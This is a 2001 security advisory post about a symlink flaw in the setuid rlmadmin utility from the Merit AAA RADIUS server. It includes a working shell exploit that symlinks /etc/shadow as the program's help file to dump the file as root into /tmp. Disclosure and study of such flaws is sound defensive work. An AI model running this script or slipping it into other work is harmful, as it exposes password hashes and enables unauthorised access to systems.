Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » rlmadmin v3.8M view file symlink vulnerability

rlmadmin v3.8M view file symlink vulnerability

by Majik on September 7th, 2001 Rlmadmin is a user management utility for RADIUS which comes with the Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/). Using this program and a simple symlink, you can view any file on the system as root.


Description:


Using the -d option of rlmadmin allows you to specify the directory


in which it will look for its configuration files.





The files that it looks for in this directory during startup are:


dictionary - dictionary translations for parsing requests and


generating responses.


rlmadmin.help - the help file that is displayed on startup.


vendors - vendor specific information.





The problem occurs when rlmadmin reads from the "rlmadmin.help" file.


If this file is symlinked to another file (such as /etc/shadow), the


program blindly follows the link, causing the contents of the file to


be displayed when the program starts up.








Versions Affected:


------------------


rlmadmin v3.8M (and earlier?)


rlmadmin v5.01 Commercial (available from www.interlinknetworks.com -


this version isn't setuid root by default,


but is still affected if set by the admin)








Exploit Code:


-------------


#!/bin/sh


# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #


# rlmadmin view file symlink vulnerability #


# (c)oded 2001 Digital Shadow #


# www.ministryofpeace.co.uk #


# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #


bloc=/usr/private/etc # executable file location


cloc=/usr/private/etc/raddb # config file location


file=/etc/shadow # file to read


echo == rlmadmin exploit - visit


www.ministryofpeace.co.uk for more!


echo = Initialising...


mkdir /tmp/peace; cd /tmp/peace


cp $cloc/dictionary $cloc/vendors .


ln -s $file rlmadmin.help


echo = Exploiting...


echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log


mv peace.log /tmp; rm dictionary rlmadmin.help vendors


echo = Done!


echo == Now look in /tmp/peace.log!








Credits:


--------


Vulnerability discovered by Digital Shadow.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »